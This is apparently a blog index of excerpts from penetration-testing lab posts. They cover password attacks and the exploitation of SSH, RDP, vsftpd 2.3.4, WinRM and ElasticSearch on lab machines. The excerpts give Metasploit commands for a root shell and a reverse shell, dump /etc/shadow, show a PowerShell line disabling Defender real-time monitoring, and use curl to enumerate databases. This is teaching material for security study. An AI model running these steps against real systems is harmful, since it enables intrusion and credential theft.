Introduction to Network Penetration Testing

In this chapter, we will cover the following topics: • Exploring password-based attacks • Performing host discovery • Identifying and exploiting vulnerable services Password based attacks: OBJECTIVES: Gaining unauthorized access to remote hosts on a network by performing attacks against its authentication system Retrieving the password associated with cryptographic hashes Retrieving the password to access a password-protected sensitive file Different types of password attacks: Brute-force attack: In a brute-force attack, every possible combination is tried against the system. This is a very time-consuming process as every possible password combination is tested against the authentication system of the target until the valid password is retrieved. While this method may seem to be the best method, the time constraints given for completing a penetration test are often not achievable. Dictionary attack: In a dictionary attack, the threat actor uses a pre-populated wordlist that contains thousands or even millions of candidate passwords. These are tested against the authentication system of the target. Each word from the wordlist is tested; however, the attack will not be successful if a valid password is not found within the wordlist being used by the threat actor. Password guessing: This is a common technique that’s used by many people, even threat actors and penetration testers, who are attempting to gain unauthorized access to a system. I have often seen IT professionals use simple and even default passwords on their networking devices, security appliances, and even the client and server systems within their organization. For instance, by performing a Google dork using common default passwords, you will easily find default passwords for various systems. These default passwords are set by the manufacturer of the device. Password cracking: In this technique, the threat actor uses various tools and techniques to retrieve valid user credentials to gain unauthorized access to a system. Sometimes, a threat actor may capture a user’s password in transit across a network in plaintext by an unsecure network protocol, or even retrieve the cryptographic hash of a password. Password spraying: This is the technique where a threat actor uses a single password and tests it against an authentication system with different usernames. The password is a guessable password, obtained from data breaches or a wordlist. The idea is to test which user account within a specific list uses the same password. This technique is good when testing which users Credential stuffing: This technique allows a threat actor to use a common wordlist of usernames and passwords against the authentication system of a target host. This technique checks which combination of usernames and passwords leads to valid user credentials. Online password attack: In an online password attack, the threat actor attempts to gain unauthorized access to a host that is running a network service or a remote access service. This allows authorized users to log in to the system across a network. A simple example of an online password attack is a threat actor attempting to retrieve the username and password of a valid user to gain access to a server that is running the Remote Desktop Protocol (RDP). Keep in mind that online password attacks focus on using a combination of passwords from a wordlist directly on a web login page or network service interface until the correct one is found. Offline password attack: In an offline password attack, the threat actor uses various tools and techniques to retrieve the valid password of a password-protected file, such as a document, or even the cryptographic hash of a user’s password. A simple example of this is capturing a domain administrator’s username and password hash from network packets. The username is usually in plaintext but you may need/want to retrieve the password from the hash value. Important SecLists is a collection of pre-built wordlists containing passwords and usernames that are commonly used by penetration testers to perform both online and offline dictionary attacks. Furthermore, SecLists contains URLs, sensitive data patterns, and fuzzing payloads, which are valuable to penetration testers. You can find the SecLists collections at https://github.com/danielmiessler/SecLists. Additionally, you can use the wordlists command within Kali Linux to view the local wordlist repository that is already pre-loaded within the operating system ...

November 24, 2025 · 5 min · 885 words · 0x-s0M3n4th

Misconfiguring SSH on Windows Server

OpenSSH is the open-source version of the Secure Shell (SSH) tools used by administrators of Linux and other non-Windows for cross-platform management of remote systems. Beginning with Windows 10 build 1809 and Windows Server 2019, OpenSSH is available as a feature on demand. OpenSSH for Windows has the following commands built in: ssh is the SSH client component that runs on the user’s local system sshd is the SSH server component that must be running on the system being managed remotely ssh-keygen generates, manages and converts authentication keys for SSH ssh-agent stores private keys used for public key authentication ssh-add adds private keys to the list allowed by the server ssh-keyscan aids in collecting the public SSH host keys from hosts sftp is the service that provides the Secure File Transfer Protocol, and runs over SSH scp is a file copy utility that runs on SSH Prerequisites check: To validate your environment, open an elevated PowerShell session and do the following: ...

November 24, 2025 · 3 min · 619 words · 0x-s0M3n4th

Gaining Access by Exploiting SSH

Now after misconfiguring ssh we will exploit it using some basic techniques. Scanning the target windows server: Performing user enumeration: Open msfconsole Once it’s loaded, use this ssh_enumusers module use auxiliary/scanner/ssh/ssh_enumusers 3. Settings: This didn’t give any results due to secure OpenSSH server, modern SSH servers are patched against this. If this was an actual pentest we hit the wall, but as we know the username and password, we can try login brute force attacks ...

November 24, 2025 · 1 min · 160 words · 0x-s0M3n4th

Exploiting RDP

First we will enable it into our EXTERNAL-RED domain controller aka windows server 2019. Fire up the VM and open server manager : Refresh the page it should show enabled Imagine if a threat actor or penetration tester could retrieve valid user credentials to access the root Domain Controller (DC) of an organization. Here, the threat actor could potentially take over and control the Windows domain environment, such as its policies, users, groups, and device accounts. Additionally, a threat actor can attempt to gain unauthorized access to client systems that use shared user credentials that are connected to the company’s domain through RDP and further set up persistent access to each compromised device to expand their foothold on the network. Let’s start exploiting: Open kali Let’s do a formal check if the target is visible on the network or not: nmap -sn 192.168.83.0/24 --exclude 192.168.83.128 3. Identifying if RDP is running on the target 192.168.83.140 ...

November 24, 2025 · 3 min · 618 words · 0x-s0M3n4th

Live Host Discovery

Using Netdiscover: sudo netdiscover -p -i interface_name{eth0} -p : Passive mode. Keep in mind that while passive network scanners help to maintain a level of stealth on a network, they don’t always detect live systems as compared to performing active scanning techniques. For instance, a targeted system may not be generating network traffic for many reasons. If a penetration tester is performing passive scanning only, there’s a possibility the targeted host may not be identified. ...

November 24, 2025 · 1 min · 185 words · 0x-s0M3n4th

Identifying and Exploiting Vulnerable Services

Exploiting linux-based systems: Fire up metasploitanle 2 linux Scan the target using nmap: nmap -A -p 21 172.30.1.134 Nmap was able to identify the service version of the FTP service as vsFTPd 2.3.4 Search in google vsftpd 2.3.4 exploit ![[Pasted image 20251020125219.png]] We are having an exploit module from rapid7 itself Open up msfconsole sudo msfconsole msf6 > use exploit/unix/ftp/vsftpd_234_backdoor msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/ interact msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.30.1.20 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 6. Upgrading shell using command python -c 'import pty; pty.spawn("/bin/bash")' 7. Got a root shell on the target system , dumped the /etc/shadow file where the hashes of the user’s passwords stored. 8. Save the credentials into a text file, make sure edit the unecessary users from the output: ...

November 24, 2025 · 5 min · 979 words · 0x-s0M3n4th

WinRM Configuration on Windows Server 2019

It is not recommended to add local accounts into Domain Controllers, they should be on workstations only. Use your windows machines, not the server. Steps should be similar as this practical. By default on windows server 2019 winRM comes enabled. We can verify through server manager as well as CLI , let’s verify: SERVER MANAGER: POWERSHELL: Default port for WINRM is 5985 # command netstat -ano | findstr "5985" The WinRM service starts automatically on Windows Server 2008, and later. On earlier versions of Windows (client or server), you need to start the service manually. winrm hardening: RESOURCE-BLOG ...

November 24, 2025 · 2 min · 276 words · 0x-s0M3n4th

WinRM Exploitation

In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems. exploitation: Open kali for scanning and exploitation: Open up msfconsole for exploitation part: sudo msfconsole use auxiliary/scanner/winrm/winrm_cmd msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140 RHOSTS => 192.168.83.140 msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator USERNAME => Administrator msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1 PASSWORD => P@ssword1 By default the command that will execute it is ipconfig /all Remember the setup of localuser for winrm access where we gave access to the user sysadmin , let’s try that: It actually worked. Now let’s try for Remote shell: msf6 > use exploit/windows/winrm/winrm_script_exec msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140 msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128 Also turn off real time protection in your windwos server , because it will quarantine the execution. use this command on powershell into your DC Set-MpPreference -DisableRealtimeMonitoring $true 3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit. 4. For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option in case your target is an old system, if not set it to false only, let’s see the options: ...

November 24, 2025 · 2 min · 313 words · 0x-s0M3n4th

Setting Up Modern Vulnerable ElasticSearch

Requirements: Step 1: Install Java JDK 17 Elasticsearch is a Java application and requires a Java Development Kit (JDK) to run. On your Windows Server 2019 VM, open the Edge browser you installed. Search for “OpenJDK 17 download/jdk 17 install” (Microsoft, Oracle, Red Hat etc are all good providers). Download the Windows x64 JDK as a .zip file (not the JRE). Once downloaded, extract the .zip file to a simple, permanent location, such as C:\Program Files\Java\jdk-17. Step 2: Set the JAVA_HOME Environment Variable This tells Windows where to find the Java installation. ...

November 24, 2025 · 3 min · 550 words · 0x-s0M3n4th

Exploiting ElasticSearch Misconfigurations

Through the previous misconfigs, i should have full access to the elastic search database. Let’s see and exploit: Reconnaissance of the database: curl -X GET "http://192.168.83.140:9200" curl -X GET "http://192.168.83.140:9200/_cat/indices?v" _cat/indices: This is the API command to list all indices. ?v: This makes the output “verbose” (shows headers), so it’s easy to read. Why it’s dangerous: This tells the attacker the names of all your databases, such as prod-users or customer-logs. EXPLANATION OF THE INFO GATHERED FROM THE FIRST COMMAND: "name" : "DC1" ...

November 24, 2025 · 7 min · 1297 words · 0x-s0M3n4th